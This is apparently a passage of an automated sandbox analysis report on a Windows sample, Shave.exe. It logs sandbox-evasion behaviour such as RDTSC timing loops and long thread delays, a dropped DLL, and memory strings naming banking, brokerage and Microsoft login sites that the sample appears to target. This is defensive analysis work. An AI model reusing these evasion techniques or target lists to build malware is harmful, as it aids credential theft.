            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Shave.exeAPI/Special instruction interceptor: Address: 452F7F5
            Source: C:\Users\user\Desktop\Shave.exeAPI/Special instruction interceptor: Address: 319F7F5
            Source: C:\Users\user\Desktop\Shave.exeRDTSC instruction interceptor: First address: 44D072A second address: 44D072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8FB9C9Eh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Shave.exeRDTSC instruction interceptor: First address: 314072A second address: 314072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8F000DEh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Shave.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeMemory allocated: 35130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeMemory allocated: 34F10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597938Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596914Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596677Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596556Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeWindow / User API: threadDelayed 8341Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeWindow / User API: threadDelayed 1497Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -35048813740048126s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 2076Thread sleep count: 8341 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 2076Thread sleep count: 1497 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596914s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596677s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596556s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -596063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exe TID: 5376Thread sleep time: -594375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_004065DA FindFirstFileW,FindClose,3_2_004065DA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004059A9
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597938Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596914Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596677Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596556Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeThread delayed: delay time: 594375Jump to behavior
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3279604982.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
